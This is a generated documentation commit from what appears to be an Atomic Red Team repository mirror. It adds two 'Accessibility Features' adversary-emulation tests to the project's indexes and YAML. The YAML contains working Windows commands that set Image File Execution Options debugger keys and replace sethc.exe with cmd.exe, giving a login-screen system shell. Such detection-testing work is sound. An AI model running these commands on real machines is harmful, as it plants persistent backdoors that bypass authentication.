security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Generated docs from job=generate-docs branch=master [ci skip]

Browse Source
This commit is contained in:
Atomic Red Team doc generator
2022-09-12 17:55:09 +00:00
parent 77ef512930
commit 9d4e9a9ccd
10 changed files with 166 additions and 13 deletions
Download Patch File Download Diff File Expand all files Collapse all files
atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json
+1 -1
View File
File diff suppressed because one or more lines are too long
atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json
+1 -1
View File
File diff suppressed because one or more lines are too long
atomics/Indexes/Indexes-CSV/index.csv
+4
View File
@@ -518,6 +518,8 @@ privilege-escalation,T1547.004,Winlogon Helper DLL,3,Winlogon Notify Key Logon P
privilege-escalation,T1546.012,Image File Execution Options Injection,1,IFEO Add Debugger,fdda2626-5234-4c90-b163-60849a24c0b8,command_prompt
privilege-escalation,T1546.012,Image File Execution Options Injection,2,IFEO Global Flags,46b1f278-c8ee-4aa5-acce-65e77b11f3c1,command_prompt
privilege-escalation,T1546.012,Image File Execution Options Injection,3,GlobalFlags in Image File Execution Options,13117939-c9b2-4a43-999e-0a543df92f0d,powershell
privilege-escalation,T1546.008,Accessibility Features,1,Attaches Command Prompt as a Debugger to a List of Target Processes,3309f53e-b22b-4eb6-8fd2-a6cf58b355a9,powershell
privilege-escalation,T1546.008,Accessibility Features,2,Replace binary of sticky keys,934e90cf-29ca-48b3-863c-411737ad44e3,command_prompt
privilege-escalation,T1055.004,Asynchronous Procedure Call,1,Process Injection via C#,611b39b7-e243-4c81-87a4-7145a90358b1,command_prompt
privilege-escalation,T1546.009,AppCert DLLs,1,Create registry persistence via AppCert DLL,a5ad6104-5bab-4c43-b295-b4c44c7c6b05,powershell
privilege-escalation,T1547.015,Login Items,1,Persistence by modifying Windows Terminal profile,ec5d76ef-82fe-48da-b931-bdb25a62bc65,powershell
@@ -745,6 +747,8 @@ persistence,T1098.004,SSH Authorized Keys,1,Modify SSH Authorized Keys,342cc723-
persistence,T1546.012,Image File Execution Options Injection,1,IFEO Add Debugger,fdda2626-5234-4c90-b163-60849a24c0b8,command_prompt
persistence,T1546.012,Image File Execution Options Injection,2,IFEO Global Flags,46b1f278-c8ee-4aa5-acce-65e77b11f3c1,command_prompt
persistence,T1546.012,Image File Execution Options Injection,3,GlobalFlags in Image File Execution Options,13117939-c9b2-4a43-999e-0a543df92f0d,powershell
persistence,T1546.008,Accessibility Features,1,Attaches Command Prompt as a Debugger to a List of Target Processes,3309f53e-b22b-4eb6-8fd2-a6cf58b355a9,powershell
persistence,T1546.008,Accessibility Features,2,Replace binary of sticky keys,934e90cf-29ca-48b3-863c-411737ad44e3,command_prompt
persistence,T1136.002,Domain Account,1,Create a new Windows domain admin user,fcec2963-9951-4173-9bfa-98d8b7834e62,command_prompt
persistence,T1136.002,Domain Account,2,Create a new account similar to ANONYMOUS LOGON,dc7726d2-8ccb-4cc6-af22-0d5afb53a548,command_prompt
persistence,T1136.002,Domain Account,3,Create a new Domain Account using PowerShell,5a3497a4-1568-4663-b12a-d4a5ed70c7d7,powershell
1 Tactic Technique # Technique Name Test # Test Name Test GUID Executor Name
518 privilege-escalation T1546.012 Image File Execution Options Injection 1 IFEO Add Debugger fdda2626-5234-4c90-b163-60849a24c0b8 command_prompt
519 privilege-escalation T1546.012 Image File Execution Options Injection 2 IFEO Global Flags 46b1f278-c8ee-4aa5-acce-65e77b11f3c1 command_prompt
520 privilege-escalation T1546.012 Image File Execution Options Injection 3 GlobalFlags in Image File Execution Options 13117939-c9b2-4a43-999e-0a543df92f0d powershell
521 privilege-escalation T1546.008 Accessibility Features 1 Attaches Command Prompt as a Debugger to a List of Target Processes 3309f53e-b22b-4eb6-8fd2-a6cf58b355a9 powershell
522 privilege-escalation T1546.008 Accessibility Features 2 Replace binary of sticky keys 934e90cf-29ca-48b3-863c-411737ad44e3 command_prompt
523 privilege-escalation T1055.004 Asynchronous Procedure Call 1 Process Injection via C# 611b39b7-e243-4c81-87a4-7145a90358b1 command_prompt
524 privilege-escalation T1546.009 AppCert DLLs 1 Create registry persistence via AppCert DLL a5ad6104-5bab-4c43-b295-b4c44c7c6b05 powershell
525 privilege-escalation T1547.015 Login Items 1 Persistence by modifying Windows Terminal profile ec5d76ef-82fe-48da-b931-bdb25a62bc65 powershell
747 persistence T1546.012 Image File Execution Options Injection 1 IFEO Add Debugger fdda2626-5234-4c90-b163-60849a24c0b8 command_prompt
748 persistence T1546.012 Image File Execution Options Injection 2 IFEO Global Flags 46b1f278-c8ee-4aa5-acce-65e77b11f3c1 command_prompt
749 persistence T1546.012 Image File Execution Options Injection 3 GlobalFlags in Image File Execution Options 13117939-c9b2-4a43-999e-0a543df92f0d powershell
750 persistence T1546.008 Accessibility Features 1 Attaches Command Prompt as a Debugger to a List of Target Processes 3309f53e-b22b-4eb6-8fd2-a6cf58b355a9 powershell
751 persistence T1546.008 Accessibility Features 2 Replace binary of sticky keys 934e90cf-29ca-48b3-863c-411737ad44e3 command_prompt
752 persistence T1136.002 Domain Account 1 Create a new Windows domain admin user fcec2963-9951-4173-9bfa-98d8b7834e62 command_prompt
753 persistence T1136.002 Domain Account 2 Create a new account similar to ANONYMOUS LOGON dc7726d2-8ccb-4cc6-af22-0d5afb53a548 command_prompt
754 persistence T1136.002 Domain Account 3 Create a new Domain Account using PowerShell 5a3497a4-1568-4663-b12a-d4a5ed70c7d7 powershell
atomics/Indexes/Indexes-CSV/windows-index.csv
+4
View File
@@ -382,6 +382,8 @@ privilege-escalation,T1547.004,Winlogon Helper DLL,3,Winlogon Notify Key Logon P
privilege-escalation,T1546.012,Image File Execution Options Injection,1,IFEO Add Debugger,fdda2626-5234-4c90-b163-60849a24c0b8,command_prompt
privilege-escalation,T1546.012,Image File Execution Options Injection,2,IFEO Global Flags,46b1f278-c8ee-4aa5-acce-65e77b11f3c1,command_prompt
privilege-escalation,T1546.012,Image File Execution Options Injection,3,GlobalFlags in Image File Execution Options,13117939-c9b2-4a43-999e-0a543df92f0d,powershell
privilege-escalation,T1546.008,Accessibility Features,1,Attaches Command Prompt as a Debugger to a List of Target Processes,3309f53e-b22b-4eb6-8fd2-a6cf58b355a9,powershell
privilege-escalation,T1546.008,Accessibility Features,2,Replace binary of sticky keys,934e90cf-29ca-48b3-863c-411737ad44e3,command_prompt
privilege-escalation,T1055.004,Asynchronous Procedure Call,1,Process Injection via C#,611b39b7-e243-4c81-87a4-7145a90358b1,command_prompt
privilege-escalation,T1546.009,AppCert DLLs,1,Create registry persistence via AppCert DLL,a5ad6104-5bab-4c43-b295-b4c44c7c6b05,powershell
privilege-escalation,T1134.001,Token Impersonation/Theft,1,Named pipe client impersonation,90db9e27-8e7c-4c04-b602-a45927884966,powershell
@@ -550,6 +552,8 @@ persistence,T1547.004,Winlogon Helper DLL,3,Winlogon Notify Key Logon Persistenc
persistence,T1546.012,Image File Execution Options Injection,1,IFEO Add Debugger,fdda2626-5234-4c90-b163-60849a24c0b8,command_prompt
persistence,T1546.012,Image File Execution Options Injection,2,IFEO Global Flags,46b1f278-c8ee-4aa5-acce-65e77b11f3c1,command_prompt
persistence,T1546.012,Image File Execution Options Injection,3,GlobalFlags in Image File Execution Options,13117939-c9b2-4a43-999e-0a543df92f0d,powershell
persistence,T1546.008,Accessibility Features,1,Attaches Command Prompt as a Debugger to a List of Target Processes,3309f53e-b22b-4eb6-8fd2-a6cf58b355a9,powershell
persistence,T1546.008,Accessibility Features,2,Replace binary of sticky keys,934e90cf-29ca-48b3-863c-411737ad44e3,command_prompt
persistence,T1136.002,Domain Account,1,Create a new Windows domain admin user,fcec2963-9951-4173-9bfa-98d8b7834e62,command_prompt
persistence,T1136.002,Domain Account,2,Create a new account similar to ANONYMOUS LOGON,dc7726d2-8ccb-4cc6-af22-0d5afb53a548,command_prompt
persistence,T1136.002,Domain Account,3,Create a new Domain Account using PowerShell,5a3497a4-1568-4663-b12a-d4a5ed70c7d7,powershell
1 Tactic Technique # Technique Name Test # Test Name Test GUID Executor Name
382 privilege-escalation T1546.012 Image File Execution Options Injection 1 IFEO Add Debugger fdda2626-5234-4c90-b163-60849a24c0b8 command_prompt
383 privilege-escalation T1546.012 Image File Execution Options Injection 2 IFEO Global Flags 46b1f278-c8ee-4aa5-acce-65e77b11f3c1 command_prompt
384 privilege-escalation T1546.012 Image File Execution Options Injection 3 GlobalFlags in Image File Execution Options 13117939-c9b2-4a43-999e-0a543df92f0d powershell
385 privilege-escalation T1546.008 Accessibility Features 1 Attaches Command Prompt as a Debugger to a List of Target Processes 3309f53e-b22b-4eb6-8fd2-a6cf58b355a9 powershell
386 privilege-escalation T1546.008 Accessibility Features 2 Replace binary of sticky keys 934e90cf-29ca-48b3-863c-411737ad44e3 command_prompt
387 privilege-escalation T1055.004 Asynchronous Procedure Call 1 Process Injection via C# 611b39b7-e243-4c81-87a4-7145a90358b1 command_prompt
388 privilege-escalation T1546.009 AppCert DLLs 1 Create registry persistence via AppCert DLL a5ad6104-5bab-4c43-b295-b4c44c7c6b05 powershell
389 privilege-escalation T1134.001 Token Impersonation/Theft 1 Named pipe client impersonation 90db9e27-8e7c-4c04-b602-a45927884966 powershell
552 persistence T1546.012 Image File Execution Options Injection 1 IFEO Add Debugger fdda2626-5234-4c90-b163-60849a24c0b8 command_prompt
553 persistence T1546.012 Image File Execution Options Injection 2 IFEO Global Flags 46b1f278-c8ee-4aa5-acce-65e77b11f3c1 command_prompt
554 persistence T1546.012 Image File Execution Options Injection 3 GlobalFlags in Image File Execution Options 13117939-c9b2-4a43-999e-0a543df92f0d powershell
555 persistence T1546.008 Accessibility Features 1 Attaches Command Prompt as a Debugger to a List of Target Processes 3309f53e-b22b-4eb6-8fd2-a6cf58b355a9 powershell
556 persistence T1546.008 Accessibility Features 2 Replace binary of sticky keys 934e90cf-29ca-48b3-863c-411737ad44e3 command_prompt
557 persistence T1136.002 Domain Account 1 Create a new Windows domain admin user fcec2963-9951-4173-9bfa-98d8b7834e62 command_prompt
558 persistence T1136.002 Domain Account 2 Create a new account similar to ANONYMOUS LOGON dc7726d2-8ccb-4cc6-af22-0d5afb53a548 command_prompt
559 persistence T1136.002 Domain Account 3 Create a new Domain Account using PowerShell 5a3497a4-1568-4663-b12a-d4a5ed70c7d7 powershell
atomics/Indexes/Indexes-Markdown/index.md
+6 -2
View File
@@ -795,7 +795,9 @@
- Atomic Test #3: GlobalFlags in Image File Execution Options [windows]
- T1055.013 Process Doppelgänging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1574.005 Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1546.008 Accessibility Features [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1546.008 Accessibility Features](../../T1546.008/T1546.008.md)
- Atomic Test #1: Attaches Command Prompt as a Debugger to a List of Target Processes [windows]
- Atomic Test #2: Replace binary of sticky keys [windows]
- T1504 PowerShell Profile [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1055.004 Asynchronous Procedure Call](../../T1055.004/T1055.004.md)
- Atomic Test #1: Process Injection via C# [windows]
@@ -1230,7 +1232,9 @@
- Atomic Test #3: GlobalFlags in Image File Execution Options [windows]
- T1177 LSASS Driver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1574.005 Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1546.008 Accessibility Features [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1546.008 Accessibility Features](../../T1546.008/T1546.008.md)
- Atomic Test #1: Attaches Command Prompt as a Debugger to a List of Target Processes [windows]
- Atomic Test #2: Replace binary of sticky keys [windows]
- T1504 PowerShell Profile [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1198 SIP and Trust Provider Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1136.002 Domain Account](../../T1136.002/T1136.002.md)
atomics/Indexes/Indexes-Markdown/windows-index.md
+6 -2
View File
@@ -594,7 +594,9 @@
- Atomic Test #3: GlobalFlags in Image File Execution Options [windows]
- T1055.013 Process Doppelgänging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1574.005 Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1546.008 Accessibility Features [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1546.008 Accessibility Features](../../T1546.008/T1546.008.md)
- Atomic Test #1: Attaches Command Prompt as a Debugger to a List of Target Processes [windows]
- Atomic Test #2: Replace binary of sticky keys [windows]
- T1504 PowerShell Profile [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1055.004 Asynchronous Procedure Call](../../T1055.004/T1055.004.md)
- Atomic Test #1: Process Injection via C# [windows]
@@ -904,7 +906,9 @@
- Atomic Test #3: GlobalFlags in Image File Execution Options [windows]
- T1177 LSASS Driver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1574.005 Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1546.008 Accessibility Features [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1546.008 Accessibility Features](../../T1546.008/T1546.008.md)
- Atomic Test #1: Attaches Command Prompt as a Debugger to a List of Target Processes [windows]
- Atomic Test #2: Replace binary of sticky keys [windows]
- T1504 PowerShell Profile [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1198 SIP and Trust Provider Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1136.002 Domain Account](../../T1136.002/T1136.002.md)
atomics/Indexes/Matrices/matrix.md
+2 -2
View File
@@ -59,7 +59,7 @@
| | PowerShell [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Launchctl [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Image File Execution Options Injection](../../T1546.012/T1546.012.md) | DLL Search Order Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Credentials in Files [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | |
| | InstallUtil [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Launch Daemon](../../T1543.004/T1543.004.md) | Process Doppelgänging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Timestomp](../../T1070.006/T1070.006.md) | Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | |
| | | [Path Interception by Search Order Hijacking](../../T1574.008/T1574.008.md) | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Reflective Code Loading](../../T1620/T1620.md) | ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | |
| | | [Web Shell](../../T1505.003/T1505.003.md) | Accessibility Features [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Time Based Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [/etc/passwd and /etc/shadow](../../T1003.008/T1003.008.md) | | | | | | |
| | | [Web Shell](../../T1505.003/T1505.003.md) | [Accessibility Features](../../T1546.008/T1546.008.md) | Time Based Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [/etc/passwd and /etc/shadow](../../T1003.008/T1003.008.md) | | | | | | |
| | | [Default Accounts](../../T1078.001/T1078.001.md) | PowerShell Profile [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [CMSTP](../../T1218.003/T1218.003.md) | [Silver Ticket](../../T1558.002/T1558.002.md) | | | | | | |
| | | [Time Providers](../../T1547.003/T1547.003.md) | [Asynchronous Procedure Call](../../T1055.004/T1055.004.md) | [Disable Windows Event Logging](../../T1562.002/T1562.002.md) | [Windows Credential Manager](../../T1555.004/T1555.004.md) | | | | | | |
| | | Image File Execution Options Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Shimming [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Control Panel](../../T1218.002/T1218.002.md) | Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | |
@@ -81,7 +81,7 @@
| | | [Image File Execution Options Injection](../../T1546.012/T1546.012.md) | [Registry Run Keys / Startup Folder](../../T1547.001/T1547.001.md) | [Group Policy Modification](../../T1484.001/T1484.001.md) | | | | | | | |
| | | LSASS Driver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Kernel Modules and Extensions](../../T1547.006/T1547.006.md) | [Default Accounts](../../T1078.001/T1078.001.md) | | | | | | | |
| | | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | KernelCallbackTable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Image File Execution Options Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Accessibility Features [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Systemd Timers](../../T1053.006/T1053.006.md) | Rundll32 [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | [Accessibility Features](../../T1546.008/T1546.008.md) | [Systemd Timers](../../T1053.006/T1053.006.md) | Rundll32 [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | PowerShell Profile [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Dylib Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Dynamic Linker Hijacking](../../T1574.006/T1574.006.md) | | | | | | | |
| | | SIP and Trust Provider Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Clear Windows Event Logs](../../T1070.001/T1070.001.md) | | | | | | | |
| | | [Domain Account](../../T1136.002/T1136.002.md) | Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | File and Directory Permissions Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
atomics/Indexes/Matrices/windows-matrix.md
+2 -2
View File
@@ -44,7 +44,7 @@
| | | [Path Interception by Search Order Hijacking](../../T1574.008/T1574.008.md) | [Image File Execution Options Injection](../../T1546.012/T1546.012.md) | [System Binary Proxy Execution](../../T1218/T1218.md) | [Credential Stuffing](../../T1110.004/T1110.004.md) | | | | | [Ingress Tool Transfer](../../T1105/T1105.md) | |
| | | [Web Shell](../../T1505.003/T1505.003.md) | Process Doppelgänging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | DLL Search Order Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Kerberoasting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | Steganography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | | [Default Accounts](../../T1078.001/T1078.001.md) | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Timestomp](../../T1070.006/T1070.006.md) | [Forced Authentication](../../T1187/T1187.md) | | | | | Fallback Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | | [Time Providers](../../T1547.003/T1547.003.md) | Accessibility Features [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Reflective Code Loading](../../T1620/T1620.md) | Password Filter DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | [Internal Proxy](../../T1090.001/T1090.001.md) | |
| | | [Time Providers](../../T1547.003/T1547.003.md) | [Accessibility Features](../../T1546.008/T1546.008.md) | [Reflective Code Loading](../../T1620/T1620.md) | Password Filter DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | [Internal Proxy](../../T1090.001/T1090.001.md) | |
| | | Image File Execution Options Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | PowerShell Profile [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Time Based Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Credentials in Files [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | Custom Command and Control Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | | Modify Existing Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Asynchronous Procedure Call](../../T1055.004/T1055.004.md) | [CMSTP](../../T1218.003/T1218.003.md) | Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | Dead Drop Resolver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | | [Local Account](../../T1136.001/T1136.001.md) | Application Shimming [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Disable Windows Event Logging](../../T1562.002/T1562.002.md) | ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | Junk Data [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
@@ -57,7 +57,7 @@
| | | [Image File Execution Options Injection](../../T1546.012/T1546.012.md) | [Change Default File Association](../../T1546.001/T1546.001.md) | [Rogue Domain Controller](../../T1207/T1207.md) | [Kerberoasting](../../T1558.003/T1558.003.md) | | | | | | |
| | | LSASS Driver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Accessibility Features [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Code Signing Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [DCSync](../../T1003.006/T1003.006.md) | | | | | | |
| | | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Parent PID Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | File Deletion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | |
| | | Accessibility Features [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Services File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Modify Registry](../../T1112/T1112.md) | [Credential API Hooking](../../T1056.004/T1056.004.md) | | | | | | |
| | | [Accessibility Features](../../T1546.008/T1546.008.md) | Services File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Modify Registry](../../T1112/T1112.md) | [Credential API Hooking](../../T1056.004/T1056.004.md) | | | | | | |
| | | PowerShell Profile [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Registry Run Keys / Startup Folder](../../T1547.001/T1547.001.md) | [Path Interception by Search Order Hijacking](../../T1574.008/T1574.008.md) | | | | | | | |
| | | SIP and Trust Provider Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | KernelCallbackTable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Binary Padding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | [Domain Account](../../T1136.002/T1136.002.md) | Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Group Policy Modification](../../T1484.001/T1484.001.md) | | | | | | | |
atomics/Indexes/index.yaml
+140 -2
View File
@@ -34046,7 +34046,76 @@ privilege-escalation:
- Administrator
x_mitre_effective_permissions:
- SYSTEM
atomic_tests: []
identifier: T1546.008
atomic_tests:
- name: Attaches Command Prompt as a Debugger to a List of Target Processes
auto_generated_guid: 3309f53e-b22b-4eb6-8fd2-a6cf58b355a9
description: |
Attaches cmd.exe to a list of processes. Configure your own Input arguments to a different executable or list of executables.
Upon successful execution, powershell will modify the registry and swap osk.exe with cmd.exe.
supported_platforms:
- windows
input_arguments:
parent_list:
description: 'Comma separated list of system binaries to which you want
to attach each #{attached_process}. Default: "osk.exe"
'
type: String
default: osk.exe, sethc.exe, utilman.exe, magnify.exe, narrator.exe, DisplaySwitch.exe,
atbroker.exe
attached_process:
description: 'Full path to process to attach to target in #{parent_list}.
Default: cmd.exe
'
type: Path
default: C:\windows\system32\cmd.exe
executor:
command: |
$input_table = "#{parent_list}".split(",")
$Name = "Debugger"
$Value = "#{attached_process}"
Foreach ($item in $input_table){
$item = $item.trim()
$registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\$item"
IF(!(Test-Path $registryPath))
{
New-Item -Path $registryPath -Force
New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType STRING -Force
}
ELSE
{
New-ItemProperty -Path $registryPath -Name $name -Value $Value
}
}
cleanup_command: |
$input_table = "#{parent_list}".split(",")
Foreach ($item in $input_table)
{
$item = $item.trim()
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\$item" /v Debugger /f 2>&1 | Out-Null
}
name: powershell
elevation_required: true
- name: Replace binary of sticky keys
auto_generated_guid: 934e90cf-29ca-48b3-863c-411737ad44e3
description: 'Replace sticky keys binary (sethc.exe) with cmd.exe
'
supported_platforms:
- windows
executor:
command: |
copy C:\Windows\System32\sethc.exe C:\Windows\System32\sethc_backup.exe
takeown /F C:\Windows\System32\sethc.exe /A
icacls C:\Windows\System32\sethc.exe /grant Administrators:F /t
copy /Y C:\Windows\System32\cmd.exe C:\Windows\System32\sethc.exe
cleanup_command: 'copy /Y C:\Windows\System32\sethc_backup.exe C:\Windows\System32\sethc.exe
'
name: command_prompt
elevation_required: true
T1504:
technique:
x_mitre_platforms:
@@ -55346,7 +55415,76 @@ persistence:
- Administrator
x_mitre_effective_permissions:
- SYSTEM
atomic_tests: []
identifier: T1546.008
atomic_tests:
- name: Attaches Command Prompt as a Debugger to a List of Target Processes
auto_generated_guid: 3309f53e-b22b-4eb6-8fd2-a6cf58b355a9
description: |
Attaches cmd.exe to a list of processes. Configure your own Input arguments to a different executable or list of executables.
Upon successful execution, powershell will modify the registry and swap osk.exe with cmd.exe.
supported_platforms:
- windows
input_arguments:
parent_list:
description: 'Comma separated list of system binaries to which you want
to attach each #{attached_process}. Default: "osk.exe"
'
type: String
default: osk.exe, sethc.exe, utilman.exe, magnify.exe, narrator.exe, DisplaySwitch.exe,
atbroker.exe
attached_process:
description: 'Full path to process to attach to target in #{parent_list}.
Default: cmd.exe
'
type: Path
default: C:\windows\system32\cmd.exe
executor:
command: |
$input_table = "#{parent_list}".split(",")
$Name = "Debugger"
$Value = "#{attached_process}"
Foreach ($item in $input_table){
$item = $item.trim()
$registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\$item"
IF(!(Test-Path $registryPath))
{
New-Item -Path $registryPath -Force
New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType STRING -Force
}
ELSE
{
New-ItemProperty -Path $registryPath -Name $name -Value $Value
}
}
cleanup_command: |
$input_table = "#{parent_list}".split(",")
Foreach ($item in $input_table)
{
$item = $item.trim()
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\$item" /v Debugger /f 2>&1 | Out-Null
}
name: powershell
elevation_required: true
- name: Replace binary of sticky keys
auto_generated_guid: 934e90cf-29ca-48b3-863c-411737ad44e3
description: 'Replace sticky keys binary (sethc.exe) with cmd.exe
'
supported_platforms:
- windows
executor:
command: |
copy C:\Windows\System32\sethc.exe C:\Windows\System32\sethc_backup.exe
takeown /F C:\Windows\System32\sethc.exe /A
